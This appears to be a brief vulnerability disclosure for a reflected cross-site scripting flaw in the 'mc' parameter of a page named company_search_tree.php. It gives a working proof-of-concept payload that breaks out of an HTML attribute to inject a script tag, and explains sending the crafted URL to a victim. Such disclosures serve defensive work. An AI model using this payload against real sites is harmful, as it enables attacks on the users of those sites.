An attacker needs to find the vulnerable parameter (mc=) and inject the JS code like: '><script>prompt("XSS");</script><div id="aa
After that, the attacker must send the full URL with the JS code to the victim and inject their browser.
#Payload: company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa